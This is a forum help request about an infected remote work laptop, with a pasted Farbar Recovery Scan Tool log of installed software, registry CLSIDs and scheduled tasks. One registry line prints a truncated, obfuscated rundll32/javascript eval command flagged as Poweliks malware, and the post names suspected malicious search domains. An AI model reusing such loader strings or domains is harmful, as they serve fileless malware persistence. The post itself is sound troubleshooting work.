

Remote employee's computer infected


  • This topic is locked
2 replies to this topic

#1 mtirado

  • Members
  • 2 posts

Posted 14 November 2014 - 01:00 PM

So I got an email today that her Trend Micro started popping up with blocked sites. I had her run 2 scans, with Trend Micro and Malwarebytes. Both came back clean. In the logs of Trend Micro I found something that launched 280 web queries at once. Some of the sites:

  • /tosearch.biz/search.php?query
  • /f0fff0.com/query?version=
  • /fff5ee.com/query?

 

Here are the logs from FRST and addition.

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13-11-2014 02

Ran by HStagner at 2014-11-14 12:51:54
Running from C:\Users\hstagner\Downloads\Malware fix (2)
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Trend Micro Client/Server Security Agent Antivirus (Enabled - Up to date) {F2F88E6A-3C7A-545F-268A-5D0BDD38EE06}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Trend Micro Client/Server Security Agent Anti-spyware (Enabled - Up to date) {49996F8E-1A40-5BD1-1C3A-6679A6BFA4BB}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
64 Bit HP CIO Components Installer (Version: 6.2.2 - Hewlett-Packard) Hidden
8500A909_BasicWeb (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden
8500A909_Help_BasicWeb (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
ActivTrak Agent v4.0.5 (x32 Version: 4.0.5.0 - Birch Grove Software, Inc.) Hidden
Adobe Flash Player 12 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 12.0.0.77 - Adobe Systems Incorporated)
Adobe Flash Player 12 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 12.0.0.77 - Adobe Systems Incorporated)
Adobe Reader X (10.1.6) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.6 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{A922C4B7-50E0-4787-A94C-59DBF3C65DBE}) (Version: 3.0 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{FE86CB0C-FCB3-4358-B4B0-B0A41E33B3DD}) (Version: 7.1.0.32 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Box Edit (HKLM-x32\...\{C5CF2E59-D4D9-4CBB-A680-284A75C14699}) (Version: 2.0.41.328 - Box)
bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
BufferChm (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden
Burn.Now 4.5 (x32 Version: 4.5.0 - Corel Corporation) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.18 - Piriform)
Cisco AnyConnect VPN Client (HKLM-x32\...\{9FC9E88A-5292-4E2C-B014-623F73D89B8C}) (Version: 2.5.2011 - Cisco Systems, Inc.)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Citrix Online Launcher (HKLM-x32\...\{AC7E7905-8C59-4806-A96D-30936A2B1FC5}) (Version: 1.0.168 - Citrix)
Conexant 20672 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.32.23.2 - Conexant)
Corel Burn.Now Lenovo Edition (HKLM-x32\...\InstallShield_{A3BE3F1E-2472-4211-8735-E8239BE49D9F}) (Version: 4.5.0 - Corel Corporation)
Corel DVD MovieFactory 7 (x32 Version: 7.0.0 - Corel Corporation) Hidden
Corel DVD MovieFactory Lenovo Edition (HKLM-x32\...\InstallShield_{50F68032-B5B7-4513-9116-C978DBD8F27A}) (Version: 7.0.0 - Corel Corporation)
Corel WinDVD (HKLM-x32\...\{5C1F18D2-F6B7-4242-B803-B5A78648185D}) (Version: 10.0.5.828 - Corel Inc.)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.8) (Version: 5.0.0.8 - Coupons.com Incorporated)
CouponBar (HKLM-x32\...\CouponBar5.0.0.4) (Version: 5.0.0.4 - Coupons.com Incorporated) <==== ATTENTION
CrashPlan (HKLM\...\{1D93DF5B-A7D0-451B-892C-E3E05E7C62E8}) (Version: 3.6.1 - CrashPlan)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Digsby (HKLM-x32\...\Digsby) (Version:  - dotSyntax, LLC)
Direct DiscRecorder (x32 Version: 1.00.0000 - Corel Corporation) Hidden
Disable AMT Profile Synchronization Pop-up for Windows XP/Vista/7 (HKLM\...\DisableAMTPopup) (Version: 1.00 - )
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.7000.4 - Dolby Laboratories Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Drive (HKLM-x32\...\{C60F3836-333A-4AE2-B526-CFDBA143A9BA}) (Version: 1.18.7821.2489 - Google, Inc.)
Google Talk Plugin (HKLM-x32\...\{0C5C1177-94C5-3EFB-A8BE-3F6AF1AF887F}) (Version: 5.38.6.0 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
GoToMeeting 6.4.5.1865 (HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\GoToMeeting) (Version: 6.4.5.1865 - CitrixOnline)
HP Officejet Pro 8500 A909 Series (HKLM\...\{B1054C0C-0C16-41E1-8A9D-35F065793E92}) (Version: 14.0 - HP)
IBM Tivoli Storage Manager Client (HKLM\...\{83B5A1A3-654F-4E2D-82D3-809BF3CA40CF}) (Version: 06.02.0100 - IBM)
iCloud (HKLM\...\{81E20D41-C277-4526-934D-F2380AF91B78}) (Version: 3.1.0.40 - Apple Inc.)
Integrated Camera Driver Installer Package Ver.1.1.0.1147 (HKLM-x32\...\{B2CA6F37-1602-4823-81B5-0384B6888AA6}) (Version: 1.1.0.1147 - RICOH)
Integrated Camera TWAIN (HKLM-x32\...\{9CA0DEE4-E84B-466F-9B96-FC255F3A929F}) (Version: 1.0.11.1223 - Chicony Electronics Co.,Ltd.)
Intel PROSet Wireless (x32 Version:  - ) Hidden
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Identity Protection Technology 1.1.2.0 (HKLM-x32\...\{C01A86F5-56E7-101F-9BC9-E3F1025EB779}) (Version: 1.1.2.0 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 16.4 - Intel)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2321 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{25FBDA9A-E868-4B3B-B9FF-D923818511A1}) (Version: 14.2.0000 - Intel Corporation)
ISAT 810 EMEA Production System (HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\ISAT 810 EMEA Production System) (Version:  - Version 810.isat.11312.001)
iTunes (HKLM\...\{0D924CB2-2EA4-4044-BAF7-770202D6BD0D}) (Version: 11.1.4.62 - Apple Inc.)
Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.450 - Oracle)
join.me (HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\JoinMe) (Version: 1.14.0.141 - LogMeIn, Inc.)
Juniper Networks Secure Meeting 7.0.0 (HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Juniper Secure Meeting 7.0.0) (Version: 7.0.0.19821 - Juniper Networks)
Juniper Networks Setup Client (HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...\Juniper_Setup_Client) (Version: 2.2.5.10685 - Juniper Networks)
Juniper Networks Setup Client Activex Control (HKLM-x32\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Auto Scroll Utility (HKLM\...\LenovoAutoScrollUtility) (Version: 1.10 - )
Lenovo Patch Utility (HKLM-x32\...\{24E92E7A-6848-4747-A3EA-3AAC0576BE52}) (Version: 1.0.1.1 - Lenovo Group Limited)
Lenovo Patch Utility 64 bit (HKLM\...\{39A04221-294E-4D90-A0F2-CCB1EF15CB56}) (Version: 1.2.0.1 - Lenovo Group Limited)
Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)
Lenovo Screen Reading Optimizer (HKLM-x32\...\{91A29166-4E1B-4664-B70B-4C4A3B6B3372}) (Version: 1.10 - Lenovo)
Lenovo System Interface Driver (HKLM\...\LENOVO.SMIIF) (Version: 1.05 - )
Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5802.24 - PC-Doctor, Inc.)
Lenovo User Guide (HKLM-x32\...\{13F59938-C595-479C-B479-F171AB9AF64F}) (Version: 1.0.0008.00 - Lenovo)
Lenovo Warranty Information (HKLM-x32\...\{FD4EC278-C1B1-4496-99ED-C0BE1B0AA521}) (Version: 1.0.0005.00 - Lenovo)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)
Meraki Systems Manager Agent (HKLM-x32\...\{ECD390E3-2A0A-44A1-837E-C4594464C149}) (Version: 1.0.87 - Meraki)
Meraki Systems Manager Agent (HKLM-x32\...\{FB91B0C4-12C6-49FD-9A74-30659B79424A}) (Version: 1.0.86 - Meraki)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Message Center Plus (HKLM-x32\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.0.1526.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visio Professional 2010 (HKLM\...\Office14.VISIO) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Firefox 33.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 33.0.3 (x86 en-US)) (Version: 33.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Network64 (Version: 140.0.215.000 - Hewlett-Packard) Hidden
Nuance PDF Converter Professional 7 (HKLM\...\{FFAE98FC-4E1A-45BB-ADED-081160A2CBD7}) (Version: 7.20.6187 - Nuance Communications, Inc.)
Nuance PDF Converter Professional 7 (HKLM-x32\...\{FFAE98FC-4E1A-45BB-ADED-081160A2CBD7}) (Version: 7.20.6187 - Nuance Communications, Inc.)
On Screen Display (HKLM\...\OnScreenDisplay) (Version: 6.60.01 - )
RapidBoot (HKLM\...\{5E2652DF-743F-482B-A593-C95F431A5769}) (Version: 1.11 - Lenovo)
Registry Patch to Enable Maximum Power Saving on WiFi Adapters for Windows 7 (HKLM\...\EnablePS) (Version: 1.00 - )
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.32.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.32.0 - Renesas Electronics Corporation) Hidden
RICOH_Media_Driver_v2.13.18.02 (HKLM-x32\...\{FE041B02-234C-4AAA-9511-80DF6482A458}) (Version: 2.13.18.02 - RICOH)
Scan (x32 Version: 140.0.167.000 - Hewlett-Packard) Hidden
Scansoft PDF Professional (x32 Version:  - ) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0057-0000-1000-0000000FF1CE}_Office14.VISIO_{3C578F10-F74F-4655-B2A6-9F88A6C415E8}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 4.01.0015 - Lenovo)
ThinkPad Bluetooth with Enhanced Data Rate Software (HKLM\...\{C6C9D5F7-630C-4125-8C4E-94AF77C1896E}) (Version: 6.4.0.2900 - Broadcom Corporation)
ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.40 - )
ThinkPad Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.61.00.11 - )
ThinkPad Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 3.64 - )
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.27.1 - )
ThinkPad UltraNav Utility (HKLM-x32\...\{17CBC505-D1AE-459D-B445-3D2000A85842}) (Version: 2.13.0 - Lenovo)
ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.75 - Lenovo)
ThinkVantage AutoLock (HKLM\...\{E224B44B-B5EB-4af3-A80A-A255358E241A}_is1) (Version: 1.05 - Lenovo)
ThinkVantage Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 2.06 - Lenovo)
Toolbox (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden
Trend Micro Client/Server Security Agent (HKLM-x32\...\{BED0B8A2-2986-49F8-90D6-FA008D37A3D2}) (Version: 5.1.1103 - Trend Micro)
VIPAccess (HKLM-x32\...\{E8D46836-CD55-453C-A107-A59EC51CB8DC}) (Version: 2.0.1.91 - VeriSign)
WebReg (x32 Version: 140.0.213.017 - Hewlett-Packard) Hidden
Windows Driver Package - Hewlett-Packard Image  (12/27/2006 8.0.0.0) (HKLM\...\A86F74A8853ED6B1102811674C7B366AF1B276BB) (Version: 12/27/2006 8.0.0.0 - Hewlett-Packard)
Windows Driver Package - Intel (e1cexpress) Net  (12/21/2010 11.8.84.0) (HKLM\...\6D23A494E9A245843FB8584D9307D3E328DF8613) (Version: 12/21/2010 11.8.84.0 - Intel)
Windows Driver Package - Intel (MEIx64) System  (10/19/2010 7.0.0.1144) (HKLM\...\90FD26A77B849AE03FF5F07A1CDA7F950406A8D8) (Version: 10/19/2010 7.0.0.1144 - Intel)
Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\0CDBDD444A1F5FFEA227B4E7DCE195F11F08240A) (Version: 09/10/2010 9.2.0.1011 - Intel)
Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\A513FC5E5A08D4EF27F234E91E0E942A0234210B) (Version: 09/10/2010 9.2.0.1011 - Intel)
Windows Driver Package - Intel System  (10/04/2010 9.2.0.1015) (HKLM\...\FE1BEBFD475BB832AAF104F5C63348E98A9286DF) (Version: 10/04/2010 9.2.0.1015 - Intel)
Windows Driver Package - Intel USB  (09/16/2010 9.2.0.1013) (HKLM\...\D97688B8E3830BF9820E15EB8D9552DCBF988CFD) (Version: 09/16/2010 9.2.0.1013 - Intel)
Windows Driver Package - Lenovo 1.61.00.11 (11/11/2010 1.61.00.11) (HKLM\...\466E9B20D871055D6D3CDA2CDD1D355E978A61AF) (Version: 11/11/2010 1.61.00.11 - Lenovo)
Windows Driver Package - Synaptics (SynTP) Mouse  (03/24/2011 15.2.19.0) (HKLM\...\5DF942712DC7660AE4A1B04809A1C3F67B0CA27C) (Version: 03/24/2011 15.2.19.0 - Synaptics)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinRAR 5.20 beta 3 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.20.3 - win.rar GmbH)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Citrix\GoToMeeting\1350\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-2926875163-4226794389-2330185411-1131_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\hstagner\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
 
==================== Restore Points  =========================
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {38F445A2-65DE-4FB0-88F7-44B7D973BFB6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131UA => C:\Users\hstagner\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-18] (Google Inc.)
Task: {400F4305-C13F-4660-9560-94E9BFF17D74} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PWMIDTSV.EXE [2011-10-04] (Lenovo Group Limited)
Task: {414FE650-6615-4CD8-8CF3-06EE6ED0380F} - System32\Tasks\Lenovo\SROptimizer => %TRPATH%\SRORest.exe
Task: {58025D8A-CF4C-4B7B-A328-055FCB05B689} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131Core => C:\Users\hstagner\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-18] (Google Inc.)
Task: {5D57EAB2-9F43-4048-80EE-0255039EDAA5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-03-11] (Adobe Systems Incorporated)
Task: {5DB4428C-BBFA-4494-99DA-2BD145A21E09} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-03-31] (PC-Doctor, Inc.)
Task: {988A2A56-6C35-40AB-A74A-4CA55003E181} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2009-05-28] ()
Task: {A2FA614D-7551-4FC9-AF06-D261D9885C42} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {A73B378C-6AB3-4B9C-9299-14D3AF228602} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-03-31] (PC-Doctor, Inc.)
Task: {D6D052ED-EE97-4B1B-9BCB-50A5EC3C6B58} - System32\Tasks\G2MUpdateTask-S-1-5-21-2926875163-4226794389-2330185411-1131 => C:\Users\hstagner\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe [2014-10-29] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {DF3088BB-E2B6-4508-AE85-8BF7AF5A44E2} - System32\Tasks\DiskUpdate => C:\SWTOOLS\OSFIXES\DISKUPDT\DiskUpdate.exe [2009-02-09] ()
Task: {E46F0D75-8707-4D20-8D69-4BAF4AEBF661} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe [2013-11-20] (Apple Inc.)
Task: {EBECB47C-2562-4585-B038-06162C8C43D0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-21] (Google Inc.)
Task: {FB011645-6596-45E3-AAAC-4034ACD44A1D} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-03-31] (PC-Doctor, Inc.)
Task: {FEA48913-28A2-4B52-A592-4701E92DF4FD} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-21] (Google Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2926875163-4226794389-2330185411-1131.job => C:\Users\hstagner\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131Core.job => C:\Users\hstagner\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131UA.job => C:\Users\hstagner\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exe
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe
 
==================== Loaded Modules (whitelisted) =============
 
2013-08-15 15:55 - 2013-08-15 15:55 - 00014848 _____ () C:\Program Files\CrashPlan\md564.dll
2014-10-20 13:33 - 2014-10-20 13:33 - 00230400 _____ () C:\Program Files\CrashPlan\cpnative64.dll
2011-07-27 23:07 - 2011-07-27 23:07 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2013-11-19 23:58 - 2013-11-19 23:58 - 03103317 _____ () C:\Program Files (x86)\Meraki\PCC Agent 1.0.87\m_agent_service.exe
2010-04-26 21:10 - 2010-04-26 21:10 - 01357872 _____ () C:\Program Files\Tivoli\TSM\baclient\LIBEAY32.dll
2010-04-26 21:10 - 2010-04-26 21:10 - 00245808 _____ () C:\Program Files\Tivoli\TSM\baclient\SSLEAY32.dll
2010-01-28 01:10 - 2010-01-28 01:10 - 00186880 _____ () C:\Program Files\ibm\gsk8\lib64\N\icc\icclib\icclib019.dll
2010-04-26 21:07 - 2010-04-26 21:07 - 00252416 _____ () C:\Program Files\Tivoli\TSM\baclient\pegclient.dll
2010-04-26 21:07 - 2010-04-26 21:07 - 01696256 _____ () C:\Program Files\Tivoli\TSM\baclient\pegcommon.dll
2010-04-26 21:07 - 2010-04-26 21:07 - 00086528 _____ () C:\Program Files\Tivoli\TSM\baclient\pegslp_client.dll
2010-04-26 21:07 - 2010-04-26 21:07 - 00984064 _____ () C:\Program Files\Tivoli\TSM\baclient\zephyr.dll
2012-12-28 03:33 - 2012-12-28 03:33 - 00094240 _____ () C:\Program Files (x86)\Trend Micro\Client Server Security Agent\zlibwapi.dll
2013-03-25 11:14 - 2013-10-23 04:59 - 00571928 _____ () C:\Program Files (x86)\Trend Micro\BM\TMBMSRV.exe
2013-09-05 03:17 - 2013-09-05 03:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
